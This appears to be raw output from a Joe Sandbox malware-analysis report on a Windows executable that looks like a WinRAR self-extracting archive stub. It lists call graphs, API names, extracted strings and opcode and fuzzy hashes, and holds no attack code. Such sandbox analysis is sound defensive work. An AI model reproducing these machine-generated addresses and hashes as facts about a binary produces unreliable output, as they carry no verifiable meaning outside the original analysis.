28272->28275 28273 7ff75aab9973 28349 7ff75aab68b0 48 API calls 28273->28349 28275->28273 28277 7ff75aab9a89 28275->28277 28276 7ff75aaa1fa0 31 API calls 28279 7ff75aab99fd 28276->28279 28277->28279 28281 7ff75aaa20b0 33 API calls 28277->28281 28278 7ff75aab997d memcpy_s 28278->28276 28337 7ff75aaba42e 28278->28337 28283 7ff75aab24c0 54 API calls 28279->28283 28280 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 28282 7ff75aaba434 28280->28282 28281->28279 28286 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 28282->28286 28284 7ff75aab9a1a 28283->28284 28285 7ff75aab9a22 28284->28285 28293 7ff75aab9aad 28284->28293 28287 7ff75aab204c 100 API calls 28285->28287 28289 7ff75aaba43a 28286->28289 28290 7ff75aab9a2b 28287->28290 28288 7ff75aab9b17 28341 7ff75aada450 28288->28341 28290->28282 28292 7ff75aab9a66 28290->28292 28297 7ff75aad2320 _handle_error 8 API calls 28292->28297 28293->28288 28294 7ff75aab8e58 33 API calls 28293->28294 28294->28293 28296 7ff75aada450 31 API calls 28301 7ff75aab9b57 __vcrt_InitializeCriticalSectionEx 28296->28301 28298 7ff75aaba40e 28297->28298 28298->28223 28299 7ff75aab2bb0 101 API calls 28299->28301 28300 7ff75aab2aa0 101 API calls 28303 7ff75aab9ca1 28300->28303 28301->28299 28302 7ff75aab28d0 104 API calls 28301->28302 28306 7ff75aab2aa0 101 API calls 28301->28306 28309 7ff75aab9c89 28301->28309 28329 7ff75aab9d5c 28301->28329 28302->28301 28304 7ff75aab28d0 104 API calls 28303->28304 28303->28329 28310 7ff75aab9cc9 28304->28310 28305 7ff75aab204c 100 API calls 28307 7ff75aaba3f5 28305->28307 28306->28301 28308 7ff75aaa1fa0 31 API calls 28307->28308 28308->28292 28309->28300 28309->28329 28310->28329 28333 7ff75aab9cd7 __vcrt_InitializeCriticalSectionEx 28310->28333 28350 7ff75aac0bbc MultiByteToWideChar 28310->28350 28312 7ff75aaba1ec 28324 7ff75aaba2c2 28312->28324 28356 7ff75aadcf90 31 API calls 2 library calls 28312->28356 28314 7ff75aaba157 28314->28312 28353 7ff75aadcf90 31 API calls 2 library calls 28314->28353 28316 7ff75aaba14b 28316->28223 28318 7ff75aaba2ae 28318->28324 28358 7ff75aab8cd0 33 API calls 2 library calls 28318->28358 28319 7ff75aaba3a2 28321 7ff75aada450 31 API calls 28319->28321 28320 7ff75aaba249 28357 7ff75aadb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28320->28357 28323 7ff75aaba3cb 28321->28323 28326 7ff75aada450 31 API calls 28323->28326 28324->28319 28328 7ff75aab8e58 33 API calls 28324->28328 28325 7ff75aaba16d 28354 7ff75aadb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28325->28354 28326->28329 28328->28324 28329->28305 28330 7ff75aaba1d8 28330->28312 28355 7ff75aab8cd0 33 API calls 2 library calls 28330->28355 28331 7ff75aac0f68 WideCharToMultiByte 28331->28333 28333->28312 28333->28314 28333->28316 28333->28329 28333->28331 28334 7ff75aaba429 28333->28334 28351 7ff75aabaa88 45 API calls _snwprintf 28333->28351 28352 7ff75aada270 31 API calls 2 library calls 28333->28352 28359 7ff75aad2624 8 API calls 28334->28359 28337->28280 28340 7ff75aaba468 28339->28340 28340->28225 28342 7ff75aada47d 28341->28342 28348 7ff75aada492 28342->28348 28360 7ff75aadd69c 15 API calls _invalid_parameter_noinfo 28342->28360 28344 7ff75aada487 28361 7ff75aad78e4 31 API calls _invalid_parameter_noinfo 28344->28361 28346 7ff75aad2320 _handle_error 8 API calls 28347 7ff75aab9b37 28346->28347 28347->28296 28348->28346 28349->28278 28350->28333 28351->28333 28352->28333 28353->28325 28354->28330 28355->28312 28356->28320 28357->28318 28358->28324 28359->28337 28360->28344 28361->28348
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 255727823-2702805183
                                                                                  • Opcode ID: b94f3a18abd40ded152ad5cdacc7b809bf44a79477dc03de5816be10aa1b7cfe
                                                                                  • Instruction ID: 64a1a5e3bbe78d7b1f4da23c4f6f38c46118a7ca8f2ecd904099250cc57cb9e2
                                                                                  • Opcode Fuzzy Hash: b94f3a18abd40ded152ad5cdacc7b809bf44a79477dc03de5816be10aa1b7cfe
                                                                                  • Instruction Fuzzy Hash: 05D2E561A0878285FA20FBA4E854AF9E361FF85780FC841B5E94D077A5EF3DE546C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                  • API String ID: 3007431893-3916287355
                                                                                  • Opcode ID: 17fc79a3ad95a6d0300714d3646d8cfefc5ee36d2af72e3520256202b352b11c
                                                                                  • Instruction ID: dbe04f55473c247f4501fb499eed675dacfc3745a36bdeb47fcb354a0845c4dd
                                                                                  • Opcode Fuzzy Hash: 17fc79a3ad95a6d0300714d3646d8cfefc5ee36d2af72e3520256202b352b11c
                                                                                  • Instruction Fuzzy Hash: 6D139272B04B8299FB10EFA4D8506EC67A1EF40398F880576EA5D17BD9DF38D586C360

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1466 7ff75aad0754-7ff75aad0829 call 7ff75aabdfd0 call 7ff75aab62dc call 7ff75aac946c call 7ff75aad3cf0 call 7ff75aac9a14 1477 7ff75aad0860-7ff75aad0883 1466->1477 1478 7ff75aad082b-7ff75aad0840 1466->1478 1481 7ff75aad0885-7ff75aad089a 1477->1481 1482 7ff75aad08ba-7ff75aad08dd 1477->1482 1479 7ff75aad0842-7ff75aad0855 1478->1479 1480 7ff75aad085b call 7ff75aad220c 1478->1480 1479->1480 1485 7ff75aad0ddd-7ff75aad0de2 call 7ff75aad7904 1479->1485 1480->1477 1487 7ff75aad08b5 call 7ff75aad220c 1481->1487 1488 7ff75aad089c-7ff75aad08af 1481->1488 1483 7ff75aad0914-7ff75aad0937 1482->1483 1484 7ff75aad08df-7ff75aad08f4 1482->1484 1491 7ff75aad096e-7ff75aad097a GetCommandLineW 1483->1491 1492 7ff75aad0939-7ff75aad094e 1483->1492 1489 7ff75aad08f6-7ff75aad0909 1484->1489 1490 7ff75aad090f call 7ff75aad220c 1484->1490 1503 7ff75aad0de3-7ff75aad0e2f call 7ff75aad7904 call 7ff75aad1900 1485->1503 1487->1482 1488->1485 1488->1487 1489->1485 1489->1490 1490->1483 1499 7ff75aad0980-7ff75aad09b7 call 7ff75aad797c call 7ff75aaa129c call 7ff75aaccad0 1491->1499 1500 7ff75aad0b47-7ff75aad0b5e call 7ff75aab6454 1491->1500 1496 7ff75aad0950-7ff75aad0963 1492->1496 1497 7ff75aad0969 call 7ff75aad220c 1492->1497 1496->1485 1496->1497 1497->1491 1525 7ff75aad09ec-7ff75aad09f3 1499->1525 1526 7ff75aad09b9-7ff75aad09cc 1499->1526 1508 7ff75aad0b60-7ff75aad0b85 call 7ff75aaa1fa0 call 7ff75aad3640 1500->1508 1509 7ff75aad0b89-7ff75aad0ce4 call 7ff75aaa1fa0 SetEnvironmentVariableW GetLocalTime call 7ff75aab3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff75aacb014 call 7ff75aab98ac call 7ff75aac67b4 * 2 DialogBoxParamW call 7ff75aac68a8 * 2 1500->1509 1520 7ff75aad0e34-7ff75aad0e6a 1503->1520 1508->1509 1572 7ff75aad0ce6 Sleep 1509->1572 1573 7ff75aad0cec-7ff75aad0cf3 1509->1573 1524 7ff75aad0e6c 1520->1524 1524->1524 1531 7ff75aad0adb-7ff75aad0b12 call 7ff75aad797c call 7ff75aaa129c call 7ff75aacfd0c 1525->1531 1532 7ff75aad09f9-7ff75aad0a13 OpenFileMappingW 1525->1532 1529 7ff75aad09ce-7ff75aad09e1 1526->1529 1530 7ff75aad09e7 call 7ff75aad220c 1526->1530 1529->1503 1529->1530 1530->1525 1531->1500 1555 7ff75aad0b14-7ff75aad0b27 1531->1555 1536 7ff75aad0ad0-7ff75aad0ad9 CloseHandle 1532->1536 1537 7ff75aad0a19-7ff75aad0a39 MapViewOfFile 1532->1537 1536->1500 1537->1536 1541 7ff75aad0a3f-7ff75aad0a6f UnmapViewOfFile MapViewOfFile 1537->1541 1541->1536 1544 7ff75aad0a71-7ff75aad0aca call 7ff75aaca190 call 7ff75aacfd0c call 7ff75aabb9b4 call 7ff75aabbb00 call 7ff75aabbb70 UnmapViewOfFile 1541->1544 1544->1536 1558 7ff75aad0b42 call 7ff75aad220c 1555->1558 1559 7ff75aad0b29-7ff75aad0b3c 1555->1559 1558->1500 1559->1558 1564 7ff75aad0dd7-7ff75aad0ddc call 7ff75aad7904 1559->1564 1564->1485 1572->1573 1575 7ff75aad0cf5 call 7ff75aac9f4c 1573->1575 1576 7ff75aad0cfa-7ff75aad0d1d call 7ff75aabb8e0 DeleteObject 1573->1576 1575->1576 1580 7ff75aad0d25-7ff75aad0d2c 1576->1580 1581 7ff75aad0d1f DeleteObject 1576->1581 1582 7ff75aad0d2e-7ff75aad0d35 1580->1582 1583 7ff75aad0d48-7ff75aad0d59 1580->1583 1581->1580 1582->1583 1584 7ff75aad0d37-7ff75aad0d43 call 7ff75aaaba0c 1582->1584 1585 7ff75aad0d5b-7ff75aad0d67 call 7ff75aacfe24 CloseHandle 1583->1585 1586 7ff75aad0d6d-7ff75aad0d7a 1583->1586 1584->1583 1585->1586 1589 7ff75aad0d9f-7ff75aad0da4 call 7ff75aac94e4 1586->1589 1590 7ff75aad0d7c-7ff75aad0d89 1586->1590 1595 7ff75aad0da9-7ff75aad0dd6 call 7ff75aad2320 1589->1595 1593 7ff75aad0d8b-7ff75aad0d93 1590->1593 1594 7ff75aad0d99-7ff75aad0d9b 1590->1594 1593->1589 1596 7ff75aad0d95-7ff75aad0d97 1593->1596 1594->1589 1597 7ff75aad0d9d 1594->1597 1596->1589 1597->1589
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 1048086575-3710569615
                                                                                  • Opcode ID: a1c62a29b36dee484797fa5976536d2a19ba5f749f11c97bfbb60a5c0b178c14
                                                                                  • Instruction ID: 442ed1b15c43401294e2cbfac3caa4874ca7b2568e7f9ae3935cf85de90078bc
                                                                                  • Opcode Fuzzy Hash: a1c62a29b36dee484797fa5976536d2a19ba5f749f11c97bfbb60a5c0b178c14
                                                                                  • Instruction Fuzzy Hash: 2812B961E08B8285FB50FB64E845AB9F361FF84744FC84276D99D06AA5EF3CE542C360

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                  • String ID: $%s:$CAPTION
                                                                                  • API String ID: 2100155373-404845831
                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                  • Instruction ID: 4f0f9c2dc074fee429457ee31d4ec38ea3f021bd613f4b26a6947e5b9e63aca6
                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                  • Instruction Fuzzy Hash: AC91F732B186458BF718EF69A800A69E7A0FF84784F885535EE4D47B58CF3DE806CB40

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                  • String ID: PNG
                                                                                  • API String ID: 211097158-364855578
                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                  • Instruction ID: d1d4686e549cec53ee425531fc3c0307e64a403bcc3ce2157fb3ca1b558af1f3
                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                  • Instruction Fuzzy Hash: 1C413E25A09B1282FE44AB96D454B79E7A0BF9CB90F8C4479DE0D47364EF7CE44AC360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: __tmp_reference_source_
                                                                                  • API String ID: 3668304517-685763994
                                                                                  • Opcode ID: d32273fa0b543aa22c5bae2e0cfe48275fd65e4c4ae787494a48fef12078bce6
                                                                                  • Instruction ID: 753260132a6d9d2861e2671f8d1e3627ccafd451bb3d567de1a1affe74368bed
                                                                                  • Opcode Fuzzy Hash: d32273fa0b543aa22c5bae2e0cfe48275fd65e4c4ae787494a48fef12078bce6
                                                                                  • Instruction Fuzzy Hash: 26E2A562A087C642FA64EBA5E1407BEE7A1FF41740F884176DB9D036A5DF3CE856C720
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: CMT
                                                                                  • API String ID: 3668304517-2756464174
                                                                                  • Opcode ID: aac8491763159f59806d652f8a14fa42eb9fc7339645808187768839367cb2af
                                                                                  • Instruction ID: 3c45c205218bc0be66ef243d83fcb6a88ba09ec260700ffbfc00333ad04e1fe0
                                                                                  • Opcode Fuzzy Hash: aac8491763159f59806d652f8a14fa42eb9fc7339645808187768839367cb2af
                                                                                  • Instruction Fuzzy Hash: 6DE2FE22B0868286FB18EBB5D050AFDA7A1FF44784F880476DB5E47696DF3CE456C360

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3476 7ff75aab40bc-7ff75aab40f3 3477 7ff75aab41d2-7ff75aab41df FindNextFileW 3476->3477 3478 7ff75aab40f9-7ff75aab4101 3476->3478 3481 7ff75aab41e1-7ff75aab41f1 GetLastError 3477->3481 3482 7ff75aab41f3-7ff75aab41f6 3477->3482 3479 7ff75aab4106-7ff75aab4118 FindFirstFileW 3478->3479 3480 7ff75aab4103 3478->3480 3479->3482 3483 7ff75aab411e-7ff75aab4146 call 7ff75aab6a0c 3479->3483 3480->3479 3484 7ff75aab41ca-7ff75aab41cd 3481->3484 3485 7ff75aab4211-7ff75aab4253 call 7ff75aad797c call 7ff75aaa129c call 7ff75aab8090 3482->3485 3486 7ff75aab41f8-7ff75aab4200 3482->3486 3496 7ff75aab4167-7ff75aab4170 3483->3496 3497 7ff75aab4148-7ff75aab4164 FindFirstFileW 3483->3497 3487 7ff75aab42eb-7ff75aab430e call 7ff75aad2320 3484->3487 3512 7ff75aab4255-7ff75aab426c 3485->3512 3513 7ff75aab428c-7ff75aab42e6 call 7ff75aabf168 * 3 3485->3513 3489 7ff75aab4202 3486->3489 3490 7ff75aab4205-7ff75aab420c call 7ff75aaa20b0 3486->3490 3489->3490 3490->3485 3500 7ff75aab4172-7ff75aab4189 3496->3500 3501 7ff75aab41a9-7ff75aab41ad 3496->3501 3497->3496 3503 7ff75aab41a4 call 7ff75aad220c 3500->3503 3504 7ff75aab418b-7ff75aab419e 3500->3504 3501->3482 3505 7ff75aab41af-7ff75aab41be GetLastError 3501->3505 3503->3501 3504->3503 3507 7ff75aab4315-7ff75aab431b call 7ff75aad7904 3504->3507 3509 7ff75aab41c0-7ff75aab41c6 3505->3509 3510 7ff75aab41c8 3505->3510 3509->3484 3509->3510 3510->3484 3517 7ff75aab4287 call 7ff75aad220c 3512->3517 3518 7ff75aab426e-7ff75aab4281 3512->3518 3513->3487 3517->3513 3518->3517 3519 7ff75aab430f-7ff75aab4314 call 7ff75aad7904 3518->3519 3519->3507
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                  • String ID:
                                                                                  • API String ID: 474548282-0
                                                                                  • Opcode ID: 3b45cdafcdb97bfe6833dfb07e445cc1833db233a54d2cf08b5bd2ce5f6738c0
                                                                                  • Instruction ID: e66dd5bc63d92befa9b52c5ed7bdf85dfa5d5df5d50c4aefe4d24a956cb15fe6
                                                                                  • Opcode Fuzzy Hash: 3b45cdafcdb97bfe6833dfb07e445cc1833db233a54d2cf08b5bd2ce5f6738c0
                                                                                  • Instruction Fuzzy Hash: E561B662A0874682FA10EBA4E84067DA361FF957A4F944371EBBD036E9DF3CD946C710
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CMT
                                                                                  • API String ID: 0-2756464174
                                                                                  • Opcode ID: 936a8f495a57b50c0dc0cbd09bc27929dc5340db306dd6e3f5389225bf01f1a2
                                                                                  • Instruction ID: 8afcc5775409dba703b2793ef3d8eeb3693b3d035208a4c501a754e043933d3f
                                                                                  • Opcode Fuzzy Hash: 936a8f495a57b50c0dc0cbd09bc27929dc5340db306dd6e3f5389225bf01f1a2
                                                                                  • Instruction Fuzzy Hash: 0442E122B0868297FB18EBB4C1506FDA7A1EF54344F880176DB5E53696DF38E41AC7A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f290487e5a667d54cc41a5d187d2fad0533435d196c5144e63478bd963f0733
                                                                                  • Instruction ID: 9d40a0960d5eb8b9e65fbd49a7d3b2963777f82a2ab0a48f51ff12a9ac0d9820
                                                                                  • Opcode Fuzzy Hash: 4f290487e5a667d54cc41a5d187d2fad0533435d196c5144e63478bd963f0733
                                                                                  • Instruction Fuzzy Hash: 42E1F522A082828BFB64EF799058A7DF790FF44748F484175EB4E47785DE3CE5428718
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
